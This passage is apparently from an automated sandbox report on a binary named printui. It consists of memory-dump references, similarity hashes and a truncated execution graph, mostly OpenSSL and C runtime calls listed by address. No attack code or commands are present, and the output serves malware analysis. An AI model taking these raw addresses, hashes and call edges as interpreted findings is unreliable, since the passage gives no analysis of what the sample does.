                                                                                              • Not Executed
                                                                                              control_flow_graph 150 7ff616b11880-7ff616b11897 SetUnhandledExceptionFilter
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                              • Instruction ID: 11ba83405db1681b2eb4ca7a60033f5972ad43ef4c1e363a06e256c334a4a5d1
                                                                                              • Opcode Fuzzy Hash: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                              • Instruction Fuzzy Hash: 81B09218E25802E2D614AB22EC950A112B07B5AB21FC04430C10DC1220DE2E91BB8700
                                                                                              Function 00007FF616B11A54 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                              • String ID:
                                                                                              • API String ID: 4104442557-0
                                                                                              • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                              • Instruction ID: d45dfba2f5c4d29e28420edf9a9e5003ad3fff386be4cf37172a538c2841b5ef
                                                                                              • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                              • Instruction Fuzzy Hash: A7111F2A605F419AEB20DF60F85426933B4FB49B68F400A35EA6D87754EF7DD6B48340

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:13.7%
                                                                                              Total number of Nodes:1311
                                                                                              Total number of Limit Nodes:116
                                                                                              execution_graph 80163 7ffbab4242d0 80164 7ffbab4242da 80163->80164 80165 7ffbab424320 ERR_new ERR_set_debug ERR_set_error 80164->80165 80166 7ffbab424355 80164->80166 80173 7ffbab424840 80165->80173 80234 7ffbab422f50 80166->80234 80168 7ffbab42436b 80169 7ffbab42437c ERR_new ERR_set_debug 80168->80169 80170 7ffbab4243a3 CRYPTO_zalloc 80168->80170 80168->80173 80171 7ffbab424867 ERR_set_error 80169->80171 80172 7ffbab4243c6 CRYPTO_THREAD_lock_new 80170->80172 80170->80173 80171->80173 80174 7ffbab4243e1 ERR_new 80172->80174 80175 7ffbab424408 80172->80175 80176 7ffbab4243eb ERR_set_debug 80174->80176 80177 7ffbab424410 CRYPTO_strdup 80175->80177 80178 7ffbab424435 OPENSSL_LH_new OPENSSL_LH_set_thunks 80175->80178 80176->80171 80177->80173 80177->80178 80180 7ffbab4244bb ERR_new 80178->80180 80181 7ffbab4244ca X509_STORE_new 80178->80181 80180->80176 80182 7ffbab4244ff 80181->80182 80183 7ffbab4244d8 ERR_new ERR_set_debug 80181->80183 80184 7ffbab42453d 80182->80184 80185 7ffbab424516 ERR_new ERR_set_debug 80182->80185 80183->80171 80246 7ffbab420eb0 80184->80246 80185->80171 80187 7ffbab424545 80188 7ffbab424570 80187->80188 80189 7ffbab424549 ERR_new 80187->80189 80191 7ffbab42457c ERR_new 80188->80191 80192 7ffbab424588 80188->80192 80190 7ffbab424553 ERR_set_debug 80189->80190 80190->80171 80191->80190 80193 7ffbab4245a0 80192->80193 80194 7ffbab424594 ERR_new 80192->80194 80284 7ffbab43a8b0 80193->80284 80194->80190 80196 7ffbab4245a8 80197 7ffbab4245ac ERR_new 80196->80197 80198 7ffbab4245b8 80196->80198 80197->80190 80302 7ffbab41e900 80198->80302 80200 7ffbab4245c8 80201 7ffbab4245cc ERR_new 80200->80201 80202 7ffbab4245db 80200->80202 80201->80190 80203 7ffbab4245fa ERR_new 80202->80203 80204 7ffbab424609 80202->80204 80203->80190 80306 7ffbab4202b0 80204->80306 80207 7ffbab424845 ERR_new ERR_set_debug 80207->80171 80208 7ffbab424635 OPENSSL_sk_num 80208->80207 80209 7ffbab424646 80208->80209 80210 7ffbab424666 80209->80210 80211 7ffbab424657 ERR_new 80209->80211 80342 7ffbab42ef20 80210->80342 80211->80210 80214 7ffbab42ef20 4 API calls 80215 7ffbab42468d OPENSSL_sk_new_null 80214->80215 80216 7ffbab4246b4 OPENSSL_sk_new_null 80215->80216 80217 7ffbab4246a5 ERR_new 80215->80217 80218 7ffbab4246d4 CRYPTO_new_ex_data 80216->80218 80219 7ffbab4246c5 ERR_new 80216->80219 80217->80216 80220 7ffbab4246ec ERR_new 80218->80220 80221 7ffbab4246fb 80218->80221 80219->80218 80220->80221 80221->80173 80222 7ffbab42473b RAND_bytes_ex 80221->80222 80346 7ffbab41e880 CRYPTO_THREAD_run_once 80221->80346 80224 7ffbab42476b RAND_priv_bytes_ex 80222->80224 80225 7ffbab4247a3 80222->80225 80224->80225 80227 7ffbab424785 RAND_priv_bytes_ex 80224->80227 80228 7ffbab4247ae RAND_priv_bytes_ex 80225->80228 80226 7ffbab424734 80226->80222 80227->80225 80227->80228 80229 7ffbab4247ec 80228->80229 80230 7ffbab4247c8 ERR_new ERR_set_debug 80228->80230 80231 7ffbab4247f8 ERR_new 80229->80231 80232 7ffbab424807 80229->80232 80230->80171 80231->80232 80347 7ffbab4304f0 48 API calls 80232->80347 80235 7ffbab422f60 80234->80235 80236 7ffbab422f6c 80235->80236 80237 7ffbab422fba 80235->80237 80238 7ffbab422fad 80236->80238 80239 7ffbab422f75 ERR_new ERR_set_debug ERR_set_error 80236->80239 80237->80238 80240 7ffbab422fd9 CRYPTO_THREAD_run_once 80237->80240 80238->80168 80239->80238 80240->80238 80241 7ffbab422ffd 80240->80241 80242 7ffbab423004 CRYPTO_THREAD_run_once 80241->80242 80243 7ffbab423026 80241->80243 80242->80238 80242->80243 80244 7ffbab42305e 80243->80244 80245 7ffbab42302d CRYPTO_THREAD_run_once 80243->80245 80244->80168 80245->80168 80247 7ffbab420ec9 80246->80247 80250 7ffbab420f24 80247->80250 80348 7ffbab42ee40 80247->80348 80249 7ffbab42ef20 4 API calls 80249->80250 80250->80249 80251 7ffbab420f65 EVP_MD_get_size 80250->80251 80253 7ffbab420f8b ERR_set_mark EVP_SIGNATURE_fetch 80250->80253 80251->80250 80252 7ffbab4213ae 80251->80252 80252->80187 80254 7ffbab420fb2 80253->80254 80255 7ffbab420fc3 EVP_KEYEXCH_fetch 80254->80255 80256 7ffbab420fde 80255->80256 80257 7ffbab420ff2 EVP_KEYEXCH_fetch 80256->80257 80258 7ffbab42100d 80257->80258 80259 7ffbab421019 EVP_KEYEXCH_free 80257->80259 80260 7ffbab421021 EVP_SIGNATURE_fetch 80258->80260 80259->80260 80261 7ffbab42103c 80260->80261 80262 7ffbab421045 EVP_SIGNATURE_free 80260->80262 80263 7ffbab42104d ERR_pop_to_mark EVP_PKEY_asn1_find_str 80261->80263 80262->80263 80264 7ffbab4210af EVP_PKEY_asn1_get0_info 80263->80264 80265 7ffbab4210ce 80263->80265 80264->80265 80266 7ffbab4210fc EVP_PKEY_asn1_find_str 80265->80266 80267 7ffbab42111f EVP_PKEY_asn1_get0_info 80266->80267 80268 7ffbab42113e 80266->80268 80267->80268 80269 7ffbab42116f EVP_PKEY_asn1_find_str 80268->80269 80270 7ffbab421192 EVP_PKEY_asn1_get0_info 80269->80270 80271 7ffbab4211b1 80269->80271 80270->80271 80272 7ffbab4211e2 EVP_PKEY_asn1_find_str 80271->80272 80273 7ffbab421205 EVP_PKEY_asn1_get0_info 80272->80273 80274 7ffbab421224 80272->80274 80273->80274 80275 7ffbab421255 EVP_PKEY_asn1_find_str 80274->80275 80276 7ffbab421278 EVP_PKEY_asn1_get0_info 80275->80276 80278 7ffbab421297 80275->80278 80276->80278 80277 7ffbab4212b4 EVP_PKEY_asn1_find_str 80279 7ffbab4212d7 EVP_PKEY_asn1_get0_info 80277->80279 80281 7ffbab4212f6 80277->80281 80278->80277 80279->80281 80280 7ffbab421313 EVP_PKEY_asn1_find_str 80282 7ffbab421336 EVP_PKEY_asn1_get0_info 80280->80282 80283 7ffbab421355 80280->80283 80281->80280 80282->80283 80283->80187 80352 7ffbab49edf0 80284->80352 80286 7ffbab43a8c2 EVP_PKEY_new 80287 7ffbab43a8ee CRYPTO_malloc 80286->80287 80288 7ffbab43ab54 CRYPTO_free CRYPTO_free EVP_PKEY_free 80286->80288 80289 7ffbab43ab4c 80287->80289 80290 7ffbab43a931 80287->80290 80288->80196 80289->80288 80290->80289 80291 7ffbab43a93a CRYPTO_malloc 80290->80291 80291->80289 80292 7ffbab43a964 ERR_set_mark 80291->80292 80295 7ffbab43a9b0 80292->80295 80293 7ffbab43a9e4 EVP_PKEY_set_type 80294 7ffbab43a9f7 EVP_PKEY_CTX_new_from_pkey 80293->80294 80293->80295 80294->80295 80296 7ffbab43aa10 EVP_PKEY_CTX_free 80294->80296 80295->80293 80295->80296 80298 7ffbab43aa2a 80295->80298 80296->80295 80297 7ffbab43aafd ERR_pop_to_mark 80297->80289 80298->80297 80299 7ffbab43aa9a OBJ_txt2nid 80298->80299 80300 7ffbab43aaac OBJ_txt2nid OBJ_txt2nid 80298->80300 80299->80298 80300->80298 80301 7ffbab43aaf5 80300->80301 80301->80297 80303 7ffbab41e910 80302->80303 80354 7ffbab41edf0 80303->80354 80305 7ffbab41e91e 80305->80200 80308 7ffbab4202da 80306->80308 80307 7ffbab4208ed 80307->80207 80307->80208 80308->80307 80363 7ffbab41ea30 7 API calls 80308->80363 80310 7ffbab42032e 80310->80307 80311 7ffbab420370 CRYPTO_malloc 80310->80311 80312 7ffbab420395 80310->80312 80311->80307 80311->80312 80364 7ffbab420130 CRYPTO_zalloc CRYPTO_free 80312->80364 80314 7ffbab4208d4 80315 7ffbab4208d8 CRYPTO_free 80314->80315 80317 7ffbab420903 CRYPTO_malloc 80314->80317 80315->80307 80318 7ffbab420b35 strncmp 80317->80318 80320 7ffbab420c3c 80318->80320 80321 7ffbab420c5a 80318->80321 80365 7ffbab41fbb0 13 API calls 80320->80365 80323 7ffbab420c93 CRYPTO_free 80321->80323 80366 7ffbab41fbb0 13 API calls 80321->80366 80325 7ffbab420cad 80323->80325 80326 7ffbab420cb8 OPENSSL_sk_new_null 80323->80326 80325->80326 80328 7ffbab420cd0 OPENSSL_sk_num 80326->80328 80329 7ffbab420cc5 80326->80329 80327 7ffbab420c90 80327->80323 80330 7ffbab420cdc 80328->80330 80331 7ffbab420d5a 80328->80331 80329->80328 80333 7ffbab420cf0 OPENSSL_sk_value 80330->80333 80337 7ffbab420d40 OPENSSL_sk_delete 80330->80337 80339 7ffbab420d0f OPENSSL_sk_push 80330->80339 80332 7ffbab420d82 CRYPTO_free OPENSSL_sk_dup 80331->80332 80334 7ffbab420d6a OPENSSL_sk_push 80331->80334 80335 7ffbab420d33 OPENSSL_sk_free 80332->80335 80336 7ffbab420da7 OPENSSL_sk_free OPENSSL_sk_set_cmp_func OPENSSL_sk_sort OPENSSL_sk_free 80332->80336 80333->80330 80333->80337 80334->80331 80338 7ffbab420d1e CRYPTO_free 80334->80338 80335->80307 80336->80307 80340 7ffbab420d4c OPENSSL_sk_num 80337->80340 80338->80335 80339->80338 80339->80340 80340->80331 80340->80333 80343 7ffbab42ef35 80342->80343 80344 7ffbab42ef4c ERR_set_mark OBJ_nid2sn EVP_MD_fetch ERR_pop_to_mark 80343->80344 80345 7ffbab424676 80343->80345 80344->80345 80345->80214 80346->80226 80347->80173 80349 7ffbab42ee55 80348->80349 80350 7ffbab42ee6c ERR_set_mark OBJ_nid2sn EVP_CIPHER_fetch ERR_pop_to_mark 80349->80350 80351 7ffbab42ee91 80349->80351 80350->80351 80351->80247 80353 7ffbab49ee1a 80352->80353 80353->80286 80353->80353 80355 7ffbab49edf0 80354->80355 80356 7ffbab41ee05 OPENSSL_sk_new_null 80355->80356 80357 7ffbab41ee1b 80356->80357 80358 7ffbab41ee83 80356->80358 80359 7ffbab41ee20 CONF_parse_list 80357->80359 80360 7ffbab41ee95 OPENSSL_sk_free 80357->80360 80358->80305 80361 7ffbab41ee4d ERR_new ERR_set_debug ERR_set_error OPENSSL_sk_free 80359->80361 80362 7ffbab41ee41 OPENSSL_sk_num 80359->80362 80360->80305 80361->80358 80362->80360 80362->80361 80363->80310 80364->80314 80365->80321 80366->80327 80367 7ffbab00abd0 80368 7ffbab00ac19 80367->80368 80397 7ffbab00eae0 80368->80397 80374 7ffbab00ad16 80411 7ffbaafc93e0 80374->80411 80378 7ffbab00adcf 80379 7ffbaafc53a0 104 API calls 80378->80379 80380 7ffbab00ade0 80379->80380 80381 7ffbaafc53a0 104 API calls 80380->80381 80382 7ffbab00adf1 80381->80382 80383 7ffbaafc53a0 104 API calls 80382->80383 80384 7ffbab00ae05 80383->80384 80385 7ffbaafc53a0 104 API calls 80384->80385 80386 7ffbab00ae19 80385->80386 80387 7ffbaafc53a0 104 API calls 80386->80387 80388 7ffbab00ae2d 80387->80388 80389 7ffbaafc53a0 104 API calls 80388->80389 80390 7ffbab00ae41 80389->80390 80391 7ffbaafc53a0 104 API calls 80390->80391 80392 7ffbab00ae55 80391->80392 80393 7ffbaafc53a0 104 API calls 80392->80393 80394 7ffbab00ae69 80393->80394 80395 7ffbaafc53a0 104 API calls 80394->80395 80396 7ffbab00ae7d 80395->80396 80437 7ffbaafd8370 80397->80437 80399 7ffbab00acf7 80400 7ffbaafc1a10 80399->80400 80401 7ffbaafc1a32 80400->80401 80444 7ffbab03d1bc 80401->80444 80403 7ffbaafc1a5d 80448 7ffbab03b0f0 80403->80448 80406 7ffbab03d5f0 80407 7ffbab03d60f 80406->80407 80408 7ffbab03d65a RaiseException 80407->80408 80409 7ffbab03d638 RtlPcToFileHeader 80407->80409 80408->80374 80410 7ffbab03d650 80409->80410 80410->80408 80413 7ffbaafc944e 80411->80413 80412 7ffbaafc94b5 memcpy_s 80460 7ffbaafcb240 80412->80460 80413->80412 80473 7ffbaafc7a60 104 API calls 5 library calls 80413->80473 80418 7ffbaafc9581 80419 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80418->80419 80421 7ffbaafc9594 80419->80421 80423 7ffbaafc53a0 80421->80423 80426 7ffbaafc53ce 80423->80426 80424 7ffbaafc54c3 80501 7ffbaafc19f0 104 API calls std::_Throw_Cpp_error 80424->80501 80426->80424 80428 7ffbaafc54bd 80426->80428 80430 7ffbaafc53ea memcpy_s 80426->80430 80431 7ffbaafc5484 80426->80431 80432 7ffbaafc545d 80426->80432 80500 7ffbaafc1950 104 API calls 2 library calls 80428->80500 80430->80378 80433 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80431->80433 80432->80428 80486 7ffbab03b118 80432->80486 80433->80430 80435 7ffbaafc546e 80435->80430 80495 7ffbab049cd4 80435->80495 80438 7ffbaafd8425 memcpy_s 80437->80438 80442 7ffbaafd8c50 104 API calls std::_Xinvalid_argument 80438->80442 80440 7ffbaafd84c2 80443 7ffbaafd8be0 104 API calls __std_fs_get_file_attributes_by_handle 80440->80443 80442->80440 80445 7ffbab03d212 80444->80445 80446 7ffbab03d1dd 80444->80446 80445->80403 80446->80445 80457 7ffbab055bd8 102 API calls 2 library calls 80446->80457 80449 7ffbab03b0f9 80448->80449 80450 7ffbaafc1a77 80449->80450 80451 7ffbab03bfd4 IsProcessorFeaturePresent 80449->80451 80450->80406 80452 7ffbab03bfec 80451->80452 80458 7ffbab03c1cc RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 80452->80458 80454 7ffbab03bfff 80459 7ffbab03bfa0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 80454->80459 80457->80445 80458->80454 80461 7ffbaafc952c 80460->80461 80462 7ffbaafcb261 80460->80462 80467 7ffbaafca250 80461->80467 80462->80461 80464 7ffbaafcb3a2 80462->80464 80482 7ffbaafcb3b0 104 API calls 2 library calls 80462->80482 80483 7ffbaafc3e40 104 API calls 2 library calls 80464->80483 80468 7ffbaafca28a 80467->80468 80469 7ffbaafc8330 104 API calls 80468->80469 80470 7ffbaafca2b1 80469->80470 80471 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80470->80471 80472 7ffbaafc9535 80471->80472 80472->80418 80474 7ffbaafc8330 80472->80474 80473->80412 80475 7ffbaafc8435 80474->80475 80476 7ffbaafc8350 80474->80476 80485 7ffbaafc5f90 104 API calls 80475->80485 80481 7ffbaafc8363 memcpy_s 80476->80481 80484 7ffbaafc95b0 104 API calls 5 library calls 80476->80484 80480 7ffbaafc842b 80480->80418 80481->80418 80482->80462 80484->80480 80489 7ffbab03b123 80486->80489 80487 7ffbab03b13c 80487->80435 80489->80487 80490 7ffbab03b142 80489->80490 80502 7ffbab054990 EnterCriticalSection LeaveCriticalSection std::_Throw_Cpp_error 80489->80502 80493 7ffbab03b14d 80490->80493 80503 7ffbab0387a8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 80490->80503 80504 7ffbaafc1950 104 API calls 2 library calls 80493->80504 80494 7ffbab03b153 std::_Throw_Cpp_error 80494->80435 80505 7ffbab049b60 102 API calls _invalid_parameter_noinfo 80495->80505 80497 7ffbab049ced 80506 7ffbab049d04 IsProcessorFeaturePresent 80497->80506 80500->80424 80502->80489 80504->80494 80505->80497 80507 7ffbab049d17 80506->80507 80510 7ffbab0499e8 14 API calls 3 library calls 80507->80510 80509 7ffbab049d32 GetCurrentProcess TerminateProcess 80510->80509 80511 7ffbab00d710 80512 7ffbab00d756 80511->80512 80524 7ffbaafc8440 80512->80524 80514 7ffbab00d767 80515 7ffbab00d78c 80514->80515 80540 7ffbaafe3900 80514->80540 80516 7ffbab00d7dc 80515->80516 80547 7ffbaafc2570 80515->80547 80518 7ffbab00d84d 80519 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80518->80519 80520 7ffbab00d85e 80519->80520 80562 7ffbab00c6f0 104 API calls 80520->80562 80522 7ffbab00d87b ctype 80525 7ffbaafc849f 80524->80525 80530 7ffbaafc846a 80524->80530 80529 7ffbaafc84ad 80525->80529 80563 7ffbaafc8700 8 API calls __std_fs_get_file_attributes_by_handle 80525->80563 80526 7ffbaafc848e 80526->80514 80527 7ffbaafc8632 80527->80514 80529->80527 80564 7ffbaafc6150 80529->80564 80530->80526 80532 7ffbaafc2570 104 API calls 80530->80532 80533 7ffbaafc8690 80532->80533 80534 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80533->80534 80536 7ffbaafc84f1 80534->80536 80535 7ffbaafc2570 104 API calls 80537 7ffbaafc86e2 80535->80537 80536->80527 80536->80535 80538 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80537->80538 80539 7ffbaafc86f3 80538->80539 80541 7ffbaafe3918 80540->80541 80546 7ffbaafe3924 memcpy_s 80540->80546 80541->80515 80542 7ffbaafe3935 memcpy_s 80542->80515 80543 7ffbaafe3a6e 80543->80542 80595 7ffbab04f0b8 80543->80595 80544 7ffbab04f0b8 _fread_nolock 102 API calls 80544->80546 80546->80542 80546->80543 80546->80544 80548 7ffbaafc25a5 80547->80548 80548->80548 80614 7ffbaafc3ff0 80548->80614 80550 7ffbaafc25b9 80628 7ffbaafc56a0 80550->80628 80552 7ffbaafc25c9 80553 7ffbaafc1a10 std::_Throw_Cpp_error 102 API calls 80552->80553 80556 7ffbaafc25ec ctype 80553->80556 80554 7ffbaafc2667 ctype 80554->80518 80555 7ffbaafc268f 80557 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80555->80557 80556->80554 80556->80555 80558 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80556->80558 80559 7ffbaafc2695 80557->80559 80558->80555 80560 7ffbab03d1bc __std_exception_copy 102 API calls 80559->80560 80561 7ffbaafc26cd 80560->80561 80561->80518 80562->80522 80563->80529 80583 7ffbab03841c 80564->80583 80566 7ffbaafc6180 80567 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80566->80567 80574 7ffbaafc61cf 80566->80574 80569 7ffbaafc61a5 80567->80569 80568 7ffbaafc621c 80587 7ffbab038494 80568->80587 80571 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80569->80571 80571->80574 80572 7ffbaafc6260 80573 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80572->80573 80576 7ffbaafc6270 80573->80576 80574->80568 80591 7ffbaafc2260 137 API calls 7 library calls 80574->80591 80576->80536 80577 7ffbaafc622e 80578 7ffbaafc6234 80577->80578 80579 7ffbaafc6283 80577->80579 80592 7ffbab038990 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 80578->80592 80593 7ffbaafc1fc0 104 API calls 2 library calls 80579->80593 80582 7ffbaafc6288 80584 7ffbab03842b 80583->80584 80586 7ffbab038430 80583->80586 80594 7ffbab053980 103 API calls std::_Locinfo::_Locinfo_ctor 80584->80594 80586->80566 80588 7ffbab03849f LeaveCriticalSection 80587->80588 80589 7ffbab0384a8 80587->80589 80589->80572 80591->80577 80592->80568 80593->80582 80598 7ffbab04f0d8 80595->80598 80599 7ffbab04f0d0 80598->80599 80600 7ffbab04f102 80598->80600 80599->80542 80600->80599 80601 7ffbab04f111 memcpy_s 80600->80601 80602 7ffbab04f14e 80600->80602 80612 7ffbab049888 13 API calls _Strcoll 80601->80612 80611 7ffbab04e5c4 EnterCriticalSection 80602->80611 80604 7ffbab04f156 80606 7ffbab04ee4c _fread_nolock 102 API calls 80604->80606 80608 7ffbab04f16d 80606->80608 80607 7ffbab04f126 80613 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80607->80613 80610 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 80608->80610 80610->80599 80612->80607 80613->80599 80618 7ffbaafc4016 80614->80618 80626 7ffbaafc40e5 80614->80626 80616 7ffbaafc401c memcpy_s 80616->80550 80618->80616 80619 7ffbaafc40a6 80618->80619 80620 7ffbaafc404d 80618->80620 80622 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80619->80622 80621 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80620->80621 80627 7ffbaafc40df 80620->80627 80624 7ffbaafc4063 80621->80624 80622->80616 80624->80616 80625 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80624->80625 80625->80627 80643 7ffbaafc19f0 104 API calls std::_Throw_Cpp_error 80626->80643 80642 7ffbaafc1950 104 API calls 2 library calls 80627->80642 80630 7ffbaafc56ce 80628->80630 80633 7ffbaafc5772 80630->80633 80636 7ffbaafc571a 80630->80636 80639 7ffbaafc56ea memcpy_s 80630->80639 80641 7ffbaafc57ad 80630->80641 80632 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80634 7ffbaafc5730 80632->80634 80637 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80633->80637 80634->80639 80640 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80634->80640 80635 7ffbaafc57a7 80644 7ffbaafc1950 104 API calls 2 library calls 80635->80644 80636->80632 80636->80635 80637->80639 80639->80552 80640->80635 80645 7ffbaafc19f0 104 API calls std::_Throw_Cpp_error 80641->80645 80642->80626 80644->80641 80646 7ffbab036550 80647 7ffbab03658f 80646->80647 80648 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 80647->80648 80650 7ffbab0365d4 80648->80650 80649 7ffbab036697 80651 7ffbab0366bc 80649->80651 80652 7ffbab0366a4 80649->80652 80650->80649 80675 7ffbab031ae0 80650->80675 80690 7ffbab02edd0 138 API calls 6 library calls 80651->80690 80686 7ffbaafc3fa0 80652->80686 80658 7ffbab03663a 80660 7ffbab036670 ctype 80658->80660 80667 7ffbab036692 80658->80667 80659 7ffbab0366b4 80661 7ffbab036703 80659->80661 80691 7ffbaafc5500 102 API calls 2 library calls 80659->80691 80663 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80660->80663 80662 7ffbab036712 80661->80662 80692 7ffbaafc5500 102 API calls 2 library calls 80661->80692 80666 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 80662->80666 80668 7ffbab036684 80663->80668 80670 7ffbab036720 80666->80670 80669 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80667->80669 80669->80649 80693 7ffbab037140 102 API calls __std_exception_copy 80670->80693 80672 7ffbab036748 80673 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80672->80673 80674 7ffbab036759 80673->80674 80676 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80675->80676 80677 7ffbab031b15 80676->80677 80678 7ffbab031b66 #21 80677->80678 80679 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 80677->80679 80694 7ffbab031f80 143 API calls 3 library calls 80678->80694 80679->80678 80682 7ffbab031bb8 80695 7ffbab031c20 80682->80695 80685 7ffbab0369b0 105 API calls __std_fs_get_file_attributes_by_handle 80685->80658 80687 7ffbaafc3fc0 80686->80687 80688 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 80687->80688 80689 7ffbaafc3fce 80688->80689 80689->80659 80690->80659 80691->80661 80692->80662 80693->80672 80694->80682 80696 7ffbab031c5c 80695->80696 80697 7ffbab031ee1 80696->80697 80713 7ffbab031c64 ctype 80696->80713 80698 7ffbaafc3fa0 104 API calls 80697->80698 80699 7ffbab031ef5 80698->80699 80714 7ffbab036b60 102 API calls __std_exception_copy 80699->80714 80700 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80702 7ffbab031bc8 80700->80702 80702->80685 80703 7ffbab031f0b 80705 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80703->80705 80704 7ffbab031c6b 80704->80700 80706 7ffbab031f1f 80705->80706 80708 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80706->80708 80707 7ffbaafc3ff0 104 API calls std::_Throw_Cpp_error 80707->80713 80709 7ffbab031f25 80708->80709 80710 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80709->80710 80711 7ffbab031f2b 80710->80711 80712 7ffbab031e8a #22 80712->80713 80713->80704 80713->80706 80713->80707 80713->80709 80713->80712 80714->80703 80715 7ffbaafe4180 80725 7ffbaafe4930 80715->80725 80717 7ffbaafe41c0 80718 7ffbaafe4192 80718->80717 80719 7ffbaafc2570 104 API calls 80718->80719 80720 7ffbaafe4206 80719->80720 80721 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80720->80721 80722 7ffbaafe4217 80721->80722 80731 7ffbaafe4a30 80722->80731 80724 7ffbaafe4238 80726 7ffbaafe494a 80725->80726 80730 7ffbaafe499a 80725->80730 80748 7ffbaafe4740 80726->80748 80728 7ffbaafe4984 80758 7ffbab04e1f4 80728->80758 80730->80718 80806 7ffbaafc5de0 80731->80806 80738 7ffbaafe4b49 80834 7ffbaafe4830 80738->80834 80740 7ffbaafe4bc3 80742 7ffbaafc2570 104 API calls 80740->80742 80747 7ffbaafe4b79 80740->80747 80743 7ffbaafe4c2d 80742->80743 80745 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80743->80745 80746 7ffbaafe4c3e 80745->80746 80747->80724 80749 7ffbaafe4763 80748->80749 80750 7ffbaafe4812 80748->80750 80749->80750 80756 7ffbaafe476d 80749->80756 80751 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80750->80751 80752 7ffbaafe4821 80751->80752 80752->80728 80753 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80754 7ffbaafe47ce 80753->80754 80754->80728 80755 7ffbaafe47b1 80755->80753 80756->80755 80766 7ffbab04e94c 80756->80766 80759 7ffbab04e224 80758->80759 80792 7ffbab04e0d0 80759->80792 80761 7ffbab04e23d 80762 7ffbab04e262 80761->80762 80802 7ffbab0498c8 102 API calls 2 library calls 80761->80802 80764 7ffbab04e277 80762->80764 80803 7ffbab0498c8 102 API calls 2 library calls 80762->80803 80764->80730 80767 7ffbab04e97c 80766->80767 80774 7ffbab04e69c 80767->80774 80770 7ffbab04e9c0 80773 7ffbab04e9d5 80770->80773 80782 7ffbab0498c8 102 API calls 2 library calls 80770->80782 80773->80755 80775 7ffbab04e6bc 80774->80775 80776 7ffbab04e6e9 80774->80776 80775->80776 80777 7ffbab04e6f1 80775->80777 80778 7ffbab04e6c6 80775->80778 80776->80770 80781 7ffbab0498c8 102 API calls 2 library calls 80776->80781 80783 